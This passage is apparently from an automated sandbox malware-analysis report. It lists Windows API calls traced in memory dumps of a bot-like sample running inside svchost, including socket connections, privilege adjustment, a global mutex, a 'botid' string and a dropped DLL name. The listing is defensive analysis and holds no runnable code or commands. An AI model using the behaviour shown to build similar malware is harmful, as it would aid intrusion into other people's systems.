      • Part of subcall function 00EFAD6A: htons.WS2_32(FF0400EF), ref: 00EFAE97
      • Part of subcall function 00EFAD6A: GetTickCount.KERNEL32 ref: 00EFAEA8
      • Part of subcall function 00EFACDB: htons.WS2_32(00000005), ref: 00EFACE1
      • Part of subcall function 00EFACDB: htons.WS2_32(00000000), ref: 00EFACF0
    • htons.WS2_32(?), ref: 00EFAF5C
    • Sleep.KERNEL32(0000012C), ref: 00EFAFD5
      • Part of subcall function 00EFAD04: getsockname.WS2_32(00000005,0294FEBC,0294FECC), ref: 00EFAD1C
      • Part of subcall function 00EFA91B: GetAdaptersAddresses.IPHLPAPI(00000002,00000010,00000000,00000000,0294FECC,0294FE20,00000005), ref: 00EFA935
      • Part of subcall function 00EFA91B: GetAdaptersAddresses.IPHLPAPI(00000002,00000010,00000000,00000000,0294FECC), ref: 00EFA952
    • htons.WS2_32(00000003), ref: 00EFB039
    • htons.WS2_32(00000004), ref: 00EFB041
    • htons.WS2_32(00000001), ref: 00EFB050
    • htons.WS2_32(00000008), ref: 00EFB058
    • htons.WS2_32(00000003), ref: 00EFB0BB
    • htons.WS2_32(00000004), ref: 00EFB0C3
    • htons.WS2_32(00000001), ref: 00EFB0D2
    • htons.WS2_32(00000008), ref: 00EFB0DA
    • Sleep.KERNEL32(00000190), ref: 00EFB127
    • htons.WS2_32(00000001), ref: 00EFB137
    • htons.WS2_32(?), ref: 00EFB18B
    • Sleep.KERNEL32(000001F4), ref: 00EFB1D4
    • htons.WS2_32(00000003), ref: 00EFB1E2
    • htons.WS2_32(00000004), ref: 00EFB1EA
    • htons.WS2_32(00000001), ref: 00EFB1F9
    • htons.WS2_32(00000008), ref: 00EFB201
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • GetTickCount.KERNEL32 ref: 00EFBB85
    • FindWindowW.USER32(#32770,00000000), ref: 00EFBB97
    • EnumChildWindows.USER32(00000000,00EFBABE,00000000), ref: 00EFBBB2
    • GetTickCount.KERNEL32 ref: 00EFBBBD
    • Sleep.KERNEL32(000000FA), ref: 00EFBBC6
    • EnumChildWindows.USER32(00000000,00EFBACA,00000000), ref: 00EFBBE9
    • UpdateWindow.USER32(00000000), ref: 00EFBBEC
    • EnumChildWindows.USER32(00000000,00EFBB1E,00000000), ref: 00EFBBFA
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • GetVersionExW.KERNEL32(?), ref: 00EF7201
      • Part of subcall function 00EF713B: lstrlenA.KERNEL32(?,?), ref: 00EF7162
      • Part of subcall function 00EF713B: wsprintfA.USER32(00EF7213,%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00EF71D6
    • GetComputerNameA.KERNEL32(?,00000000), ref: 00EF722E
    • lstrlenA.KERNEL32(?), ref: 00EF7250
    • lstrlenA.KERNEL32(?), ref: 00EF72A5
    • wsprintfA.USER32(-00000214,%s_W%d%d%d.%s,?,?,?,?,?), ref: 00EF72D9
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00EF8549
    • StrStrIW.SHLWAPI(?,Roaming), ref: 00EF8555
    • lstrcpyW.KERNEL32(00000000,Local), ref: 00EF8565
    • lstrcatW.KERNEL32(?,00EFEA08), ref: 00EF8571
    • lstrlenW.KERNEL32(?), ref: 00EF8578
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • GetTickCount.KERNEL32 ref: 00EFAD9F
    • GetTickCount.KERNEL32 ref: 00EFAE03
      • Part of subcall function 00EFA86A: select.WS2_32(00000000,00000001,00000000,00000000,00000000), ref: 00EFA8B2
      • Part of subcall function 00EFA86A: WSAGetLastError.WS2_32 ref: 00EFA8BD
      • Part of subcall function 00EFA86A: recvfrom.WS2_32(00000102,00000000,00000000,00000000,FFFECD63,00000010), ref: 00EFA8D7
    • htons.WS2_32(00000101), ref: 00EFAE64
    • htons.WS2_32(FF0400EF), ref: 00EFAE97
    • GetTickCount.KERNEL32 ref: 00EFAEA8
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
      • Part of subcall function 00EF5907: GetAddrInfoW.WS2_32 ref: 00EF5935
      • Part of subcall function 00EF5907: FreeAddrInfoW.WS2_32(00000000), ref: 00EF594E
    • socket.WS2_32(00000002,00000001,00000000), ref: 00EFAA1D
    • htons.WS2_32(00000050), ref: 00EFAA41
    • connect.WS2_32(00000000,00000010,00000010), ref: 00EFAA52
    • closesocket.WS2_32(00000000), ref: 00EFAA5B
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • GetCurrentProcess.KERNEL32 ref: 00EF52B3
    • OpenProcessToken.ADVAPI32(00000000), ref: 00EF52BA
    • LookupPrivilegeValueW.ADVAPI32(00000000), ref: 00EF52D5
    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 00EF52F2
    • CloseHandle.KERNEL32(?), ref: 00EF52FD
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • WSAStartup.WS2_32(00000202,?), ref: 00EFD1EA
      • Part of subcall function 00EF6926: HeapCreate.KERNEL32(00040000,00400000,00000000), ref: 00EF693B
      • Part of subcall function 00EFD12C: OpenMutexW.KERNEL32(00100000,00000000,Global\zx5fwtw4ep), ref: 00EFD13A
      • Part of subcall function 00EFD12C: CloseHandle.KERNEL32(00000000), ref: 00EFD145
      • Part of subcall function 00EFBCB0: GetVersionExW.KERNEL32(00F036E0), ref: 00EFBCD1
      • Part of subcall function 00EFBC90: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000001,00F03674,00000000), ref: 00EFBCA8
      • Part of subcall function 00EF699A: HeapDestroy.KERNEL32(02510000), ref: 00EF69AC
      • Part of subcall function 00EF6955: HeapAlloc.KERNEL32(00000008,?,?,00EF4089,00000000,00000000,?,00EF4FDD,00000000,00000000,?,00EF391E,02908008,02908008,00EF328A,00EFD51B), ref: 00EF6963
      • Part of subcall function 00EF7BC2: InitializeCriticalSection.KERNEL32(00000420), ref: 00EF7C0F
      • Part of subcall function 00EF8599: DeleteCriticalSection.KERNEL32(02909E88,00EFD1C8,0290ACE0,00EFD53F,?,?,00EFBAB7), ref: 00EF859D
      • Part of subcall function 00EF327D: CloseHandle.KERNEL32(0000039C), ref: 00EF329F
      • Part of subcall function 00EF327D: DeleteCriticalSection.KERNEL32(0290839C,?,?,00EFBAB7), ref: 00EF32B2
      • Part of subcall function 00EF327D: DeleteCriticalSection.KERNEL32(029083B4,?,?,00EFBAB7), ref: 00EF32BB
      • Part of subcall function 00EF3334: HeapFree.KERNEL32(00000000,?,?,00EFD1CE,02909E90,0290ACE0,00EFD53F,?,?,00EFBAB7), ref: 00EF6992
      • Part of subcall function 00EF7F4A: DeleteCriticalSection.KERNEL32(0290B100,0290ACE0), ref: 00EF7F81
      • Part of subcall function 00EF3244: InitializeCriticalSection.KERNEL32(00000394), ref: 00EF3265
      • Part of subcall function 00EF3244: InitializeCriticalSection.KERNEL32(000003AC), ref: 00EF326E
      • Part of subcall function 00EFDA92: InitializeCriticalSection.KERNEL32(00F03834), ref: 00EFDAA1
      • Part of subcall function 00EFDA92: DeleteCriticalSection.KERNEL32(00F03834,?,00EFD460,00F03688,?,?), ref: 00EFDAB9
      • Part of subcall function 00EFDA92: GetModuleHandleW.KERNEL32(ntdll.dll), ref: 00EFDBD8
      • Part of subcall function 00EFDA92: GetProcAddress.KERNEL32(00000000), ref: 00EFDBE1
      • Part of subcall function 00EFDA92: GetModuleHandleW.KERNEL32(ntdll.dll), ref: 00EFDBF2
      • Part of subcall function 00EFDA92: GetProcAddress.KERNEL32(00000000), ref: 00EFDBF5
      • Part of subcall function 00EFDA92: GetModuleHandleW.KERNEL32(ntdll.dll), ref: 00EFDC06
      • Part of subcall function 00EFDA92: GetProcAddress.KERNEL32(00000000), ref: 00EFDC09
      • Part of subcall function 00EFDA92: GetCurrentProcessId.KERNEL32 ref: 00EFDC10
      • Part of subcall function 00EF52A4: GetCurrentProcess.KERNEL32 ref: 00EF52B3
      • Part of subcall function 00EF52A4: OpenProcessToken.ADVAPI32(00000000), ref: 00EF52BA
      • Part of subcall function 00EF52A4: LookupPrivilegeValueW.ADVAPI32(00000000), ref: 00EF52D5
      • Part of subcall function 00EF52A4: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 00EF52F2
      • Part of subcall function 00EF52A4: CloseHandle.KERNEL32(?), ref: 00EF52FD
    • CreateThread.KERNEL32(00000000,00000000,00EFCF96,00F032D0), ref: 00EFD498
      • Part of subcall function 00EFD150: CreateMutexW.KERNEL32(00F03678,00000001,Global\zx5fwtw4ep), ref: 00EFD15C
    • TerminateThread.KERNEL32(00000000), ref: 00EFD4BE
      • Part of subcall function 00EFDC95: DeleteCriticalSection.KERNEL32(00F03834,00EFD50A,?,?,00EFBAB7), ref: 00EFDC9A
    Strings
    • D:P(A;;GA;;;SY)(A;;GA;;;BA)(A;;GA;;;WD)(A;;GA;;;RC)S:(ML;;NW;;;LW), xrefs: 00EFD257
    • D:P(A;;GA;;;SY)(A;;GA;;;BA)(A;;GA;;;WD)(A;;GA;;;RC)(A;;GA;;;AC)S:(ML;;NW;;;S-1-16-0), xrefs: 00EFD250
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
      • Part of subcall function 00EF3334: HeapFree.KERNEL32(00000000,?,?,00EFD1CE,02909E90,0290ACE0,00EFD53F,?,?,00EFBAB7), ref: 00EF6992
    • CreateFileW.KERNEL32(00EF85E7,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00EF872D
    • GetFileSize.KERNEL32(00000000,00000000), ref: 00EF8741
    • CloseHandle.KERNEL32(?), ref: 00EF87C2
      • Part of subcall function 00EF6955: HeapAlloc.KERNEL32(00000008,?,?,00EF4089,00000000,00000000,?,00EF4FDD,00000000,00000000,?,00EF391E,02908008,02908008,00EF328A,00EFD51B), ref: 00EF6963
    • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00EF876E
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • FindResourceW.KERNEL32(?,?,0000000A), ref: 00EF5546
    • LoadResource.KERNEL32(?,00000000), ref: 00EF5557
    • SizeofResource.KERNEL32(?,00000000), ref: 00EF5567
    • LockResource.KERNEL32(00000000), ref: 00EF5573
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
      • Part of subcall function 00EF3334: HeapFree.KERNEL32(00000000,?,?,00EFD1CE,02909E90,0290ACE0,00EFD53F,?,?,00EFBAB7), ref: 00EF6992
    • lstrlenW.KERNEL32(00000000), ref: 00EFABB2
    • StrToIntW.SHLWAPI(0294FEE6), ref: 00EFABE3
      • Part of subcall function 00EF6955: HeapAlloc.KERNEL32(00000008,?,?,00EF4089,00000000,00000000,?,00EF4FDD,00000000,00000000,?,00EF391E,02908008,02908008,00EF328A,00EFD51B), ref: 00EF6963
      • Part of subcall function 00EF589B: lstrlenW.KERNEL32(000000FF), ref: 00EF58A9
      • Part of subcall function 00EF589B: WideCharToMultiByte.KERNEL32(00000000,00000000,000000FF,00000000,00000D96,00000001,00000000,00000000), ref: 00EF58E0
      • Part of subcall function 00EF589B: inet_addr.WS2_32(00000D96), ref: 00EF58ED
    • htons.WS2_32(00000D96), ref: 00EFAC57
      • Part of subcall function 00EF5907: GetAddrInfoW.WS2_32 ref: 00EF5935
      • Part of subcall function 00EF5907: FreeAddrInfoW.WS2_32(00000000), ref: 00EF594E
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
      • Part of subcall function 00EF87D1: lstrlenA.KERNEL32(?,00000000,00000000,-00000006,?,?,?,?,?,00EF88DE,?,-00000006,00000000,00000000,-00000006,00EF89B3), ref: 00EF87FB
      • Part of subcall function 00EF87D1: lstrlenA.KERNEL32(?,00000000,00000000,-00000006,?,?,?,?,?,00EF88DE,?,-00000006,00000000,00000000,-00000006,00EF89B3), ref: 00EF8843
      • Part of subcall function 00EF6955: HeapAlloc.KERNEL32(00000008,?,?,00EF4089,00000000,00000000,?,00EF4FDD,00000000,00000000,?,00EF391E,02908008,02908008,00EF328A,00EFD51B), ref: 00EF6963
      • Part of subcall function 00EF3334: HeapFree.KERNEL32(00000000,?,?,00EFD1CE,02909E90,0290ACE0,00EFD53F,?,?,00EFBAB7), ref: 00EF6992
    • CreateFileW.KERNEL32(00EF89B3,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00EF8920
    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00EF893A
    • CloseHandle.KERNEL32(00000000), ref: 00EF8951
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • htons.WS2_32(?), ref: 00EFAB12
      • Part of subcall function 00EFA78C: socket.WS2_32(00000002,00000002,00000000), ref: 00EFA79B
      • Part of subcall function 00EFA78C: bind.WS2_32(00000000,0294FED0,00000010), ref: 00EFA7D0
      • Part of subcall function 00EFA78C: WSAGetLastError.WS2_32 ref: 00EFA7DB
      • Part of subcall function 00EFA78C: closesocket.WS2_32(00000000), ref: 00EFA7E4
      • Part of subcall function 00EFA78C: WSASetLastError.WS2_32(00000000), ref: 00EFA7EB
    • htons.WS2_32(?), ref: 00EFAB33
    • htons.WS2_32(00000400), ref: 00EFAB55
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
      • Part of subcall function 00EF8540: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00EF8549
      • Part of subcall function 00EF8540: StrStrIW.SHLWAPI(?,Roaming), ref: 00EF8555
      • Part of subcall function 00EF8540: lstrcpyW.KERNEL32(00000000,Local), ref: 00EF8565
      • Part of subcall function 00EF8540: lstrcatW.KERNEL32(?,00EFEA08), ref: 00EF8571
      • Part of subcall function 00EF8540: lstrlenW.KERNEL32(?), ref: 00EF8578
    • lstrcatW.KERNEL32(?,nwuvbe82n0.dll), ref: 00EF85C5
      • Part of subcall function 00EF8BC8: EnterCriticalSection.KERNEL32(-00000008,00EF85D4), ref: 00EF8BCC
      • Part of subcall function 00EF8714: CreateFileW.KERNEL32(00EF85E7,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00EF872D
      • Part of subcall function 00EF8714: GetFileSize.KERNEL32(00000000,00000000), ref: 00EF8741
      • Part of subcall function 00EF8714: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00EF876E
      • Part of subcall function 00EF8714: CloseHandle.KERNEL32(?), ref: 00EF87C2
      • Part of subcall function 00EF8BD6: LeaveCriticalSection.KERNEL32(00EF87A5,00EF8AF9,00000000,00000000,-00000006,00000006,?,00EF86F4,00000000,-00000006,00000000,?,?,?,00000000,00000000), ref: 00EF8BDA
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
      • Part of subcall function 00EF8540: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00EF8549
      • Part of subcall function 00EF8540: StrStrIW.SHLWAPI(?,Roaming), ref: 00EF8555
      • Part of subcall function 00EF8540: lstrcpyW.KERNEL32(00000000,Local), ref: 00EF8565
      • Part of subcall function 00EF8540: lstrcatW.KERNEL32(?,00EFEA08), ref: 00EF8571
      • Part of subcall function 00EF8540: lstrlenW.KERNEL32(?), ref: 00EF8578
    • lstrcatW.KERNEL32(?,nwuvbe82n0.dll), ref: 00EF8990
      • Part of subcall function 00EF8BC8: EnterCriticalSection.KERNEL32(-00000008,00EF85D4), ref: 00EF8BCC
      • Part of subcall function 00EF88BA: CreateFileW.KERNEL32(00EF89B3,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00EF8920
      • Part of subcall function 00EF88BA: WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00EF893A
      • Part of subcall function 00EF88BA: CloseHandle.KERNEL32(00000000), ref: 00EF8951
      • Part of subcall function 00EF8BD6: LeaveCriticalSection.KERNEL32(00EF87A5,00EF8AF9,00000000,00000000,-00000006,00000006,?,00EF86F4,00000000,-00000006,00000000,?,?,?,00000000,00000000), ref: 00EF8BDA
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • CreateMutexW.KERNEL32(00F03678,00000001,Global\zx5fwtw4ep), ref: 00EFD15C
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
      • Part of subcall function 00EFAB00: htons.WS2_32(?), ref: 00EFAB12
      • Part of subcall function 00EFAB00: htons.WS2_32(?), ref: 00EFAB33
      • Part of subcall function 00EFAB00: htons.WS2_32(00000400), ref: 00EFAB55
    • WSAGetLastError.WS2_32(0294FEE4,00000000), ref: 00EFB2B2
    • closesocket.WS2_32(00000000), ref: 00EFB334
      • Part of subcall function 00EFABA4: lstrlenW.KERNEL32(00000000), ref: 00EFABB2
      • Part of subcall function 00EFABA4: StrToIntW.SHLWAPI(0294FEE6), ref: 00EFABE3
      • Part of subcall function 00EFABA4: htons.WS2_32(00000D96), ref: 00EFAC57
      • Part of subcall function 00EFAEE0: htons.WS2_32(00000001), ref: 00EFAF0B
      • Part of subcall function 00EFAEE0: htons.WS2_32(?), ref: 00EFAF5C
      • Part of subcall function 00EFAEE0: Sleep.KERNEL32(0000012C), ref: 00EFAFD5
      • Part of subcall function 00EFAEE0: htons.WS2_32(00000003), ref: 00EFB039
      • Part of subcall function 00EFAEE0: htons.WS2_32(00000004), ref: 00EFB041
      • Part of subcall function 00EFAEE0: htons.WS2_32(00000001), ref: 00EFB050
      • Part of subcall function 00EFAEE0: htons.WS2_32(00000008), ref: 00EFB058
      • Part of subcall function 00EFAEE0: htons.WS2_32(00000003), ref: 00EFB0BB
      • Part of subcall function 00EFAEE0: htons.WS2_32(00000004), ref: 00EFB0C3
      • Part of subcall function 00EFAEE0: htons.WS2_32(00000001), ref: 00EFB0D2
      • Part of subcall function 00EFAEE0: htons.WS2_32(00000008), ref: 00EFB0DA
      • Part of subcall function 00EFAEE0: Sleep.KERNEL32(00000190), ref: 00EFB127
      • Part of subcall function 00EFAEE0: htons.WS2_32(00000001), ref: 00EFB137
      • Part of subcall function 00EFAEE0: htons.WS2_32(?), ref: 00EFB18B
      • Part of subcall function 00EFAEE0: Sleep.KERNEL32(000001F4), ref: 00EFB1D4
      • Part of subcall function 00EFAEE0: htons.WS2_32(00000003), ref: 00EFB1E2
      • Part of subcall function 00EFAEE0: htons.WS2_32(00000004), ref: 00EFB1EA
      • Part of subcall function 00EFAEE0: htons.WS2_32(00000001), ref: 00EFB1F9
      • Part of subcall function 00EFAEE0: htons.WS2_32(00000008), ref: 00EFB201
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • CreateMutexW.KERNEL32(00000000,00000000,00000000), ref: 00EF32F3
    • CloseHandle.KERNEL32(?), ref: 00EF331C
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
      • Part of subcall function 00EF71E5: GetVersionExW.KERNEL32(?), ref: 00EF7201
      • Part of subcall function 00EF71E5: GetComputerNameA.KERNEL32(?,00000000), ref: 00EF722E
      • Part of subcall function 00EF71E5: lstrlenA.KERNEL32(?), ref: 00EF7250
      • Part of subcall function 00EF71E5: lstrlenA.KERNEL32(?), ref: 00EF72A5
      • Part of subcall function 00EF71E5: wsprintfA.USER32(-00000214,%s_W%d%d%d.%s,?,?,?,?,?), ref: 00EF72D9
    • lstrlenA.KERNEL32(00000314,00000000,botid,00000314,00000080,00000000,00000000,?,00EF7EC5,00000438,00000000,?,00EF7C1C), ref: 00EF7357
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • wsprintfA.USER32(00F02FBC,%d.%d.%d.%d,00000000,00000000,00000000,00000000,00F032D0,?,?,00EFD0DC,00000029,00EFC788,00F032D0,0000002B,00EFC664,00F032D0), ref: 00EFBE43
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • CreateThread.KERNEL32(00000000,00000000,00EFBB78,00000000), ref: 00EFBC1C
    • CloseHandle.KERNEL32(00000000), ref: 00EFBC23
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    Memory Dump Source
    • Source File: 00000006.00000002.615036791.00A60000.00000040.sdmp, Offset: 00A60000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_a60000_svchost.jbxd
    APIs
    • CreateThread.KERNEL32(00000000,00000000,00EF6B9A,?), ref: 00EF6CE7
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • sendto.WS2_32(00000064,00000000,71AB6872,00000000,00000010,00000010), ref: 00EFA80F
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • HeapCreate.KERNEL32(00040000,00400000,00000000), ref: 00EF693B
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000001,00F03674,00000000), ref: 00EFBCA8
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,?,00A603E0,?,00000000), ref: 00A60634
    Memory Dump Source
    • Source File: 00000006.00000002.615036791.00A60000.00000040.sdmp, Offset: 00A60000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_a60000_svchost.jbxd

    Non-executed Functions

    APIs
    • WSAStartup.WS2_32(00000202,?), ref: 00EF11E7
    • GetLastError.KERNEL32 ref: 00EF11F1
    • WSACreateEvent.WS2_32 ref: 00EF1200
    • CloseHandle.KERNEL32(?), ref: 00EF1583
      • Part of subcall function 00EF6955: HeapAlloc.KERNEL32(00000008,?,?,00EF4089,00000000,00000000,?,00EF4FDD,00000000,00000000,?,00EF391E,02908008,02908008,00EF328A,00EFD51B), ref: 00EF6963
    • shutdown.WS2_32(00000001,00000002), ref: 00EF1245
    • closesocket.WS2_32(00000001), ref: 00EF124C
    • Sleep.KERNEL32(000249F0), ref: 00EF1257
    • WSASocketW.WS2_32(00000002,00000001,00000006,00000000,00000000,00000000), ref: 00EF1266
    • inet_addr.WS2_32(?), ref: 00EF1282
    • htons.WS2_32(?), ref: 00EF1291
    • Sleep.KERNEL32(000249F0), ref: 00EF12B3
    • WSAConnect.WS2_32(?,?,00000010,00000000,00000000,00000000,00000000), ref: 00EF12CC
    • WSASend.WS2_32 ref: 00EF1369
    • WSAEventSelect.WS2_32(?,?,00000021), ref: 00EF13A0
    • WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,000000FF,00000000), ref: 00EF13BD
    • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 00EF13DB
    • WSARecv.WS2_32(?,?,00000001,?,?,00000000,00000000), ref: 00EF1413
    • WSAGetLastError.WS2_32 ref: 00EF143E
      • Part of subcall function 00EF3334: HeapFree.KERNEL32(00000000,?,?,00EFD1CE,02909E90,0290ACE0,00EFD53F,?,?,00EFBAB7), ref: 00EF6992
      • Part of subcall function 00EF9B51: CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000), ref: 00EF9B8C
      • Part of subcall function 00EF9B51: GetLastError.KERNEL32(?,?,?,00EF7AD8,00000000), ref: 00EF9B92
      • Part of subcall function 00EF9B51: GetLastError.KERNEL32(?,?,?,00EF7AD8,00000000), ref: 00EF9B98
      • Part of subcall function 00EF9B51: CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000008), ref: 00EF9BB2
      • Part of subcall function 00EF9B51: CryptImportKey.ADVAPI32(00000000,00000000,00EF7AD8,00000000,00000000,00EF7AD8), ref: 00EF9BCD
      • Part of subcall function 00EF9B51: CryptCreateHash.ADVAPI32(00000000,00008004,00000000,00000000,00000000), ref: 00EF9BE8
      • Part of subcall function 00EF9B51: CryptHashData.ADVAPI32(00000000,?,00000000,00000000), ref: 00EF9BFA
      • Part of subcall function 00EF9B51: CryptVerifySignatureW.ADVAPI32(00000000,?,?,00EF7AD8,00000000,00000000,?,?,?,00EF7AD8,00000000), ref: 00EF9C12
      • Part of subcall function 00EF9B51: CryptDestroyHash.ADVAPI32(00000000), ref: 00EF9C1D
      • Part of subcall function 00EF9B51: CryptDestroyKey.ADVAPI32(00EF7AD8), ref: 00EF9C26
      • Part of subcall function 00EF9B51: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00EF9C30
    • GetTickCount.KERNEL32 ref: 00EF14F6
    • GetTickCount.KERNEL32 ref: 00EF14FB
      • Part of subcall function 00EF1D43: WSASocketW.WS2_32(00000002,00000001,00000006,00000000,00000000,00000000), ref: 00EF1D63
      • Part of subcall function 00EF1D43: inet_addr.WS2_32(?), ref: 00EF1D7D
      • Part of subcall function 00EF1D43: htons.WS2_32(?), ref: 00EF1D8B
      • Part of subcall function 00EF1D43: WSAConnect.WS2_32(?,?,00000010,00000000,00000000,00000000,00000000), ref: 00EF1DA2
      • Part of subcall function 00EF1D43: CreateThread.KERNEL32(00000000,00000000,00EF273A,00000000), ref: 00EF1DD2
      • Part of subcall function 00EF1D43: SetThreadPriority.KERNEL32(00000000,00000002), ref: 00EF1DE2
      • Part of subcall function 00EF1D43: WSASend.WS2_32(00000000,?,00000001,?,00000000,00000000,00000000), ref: 00EF1E1B
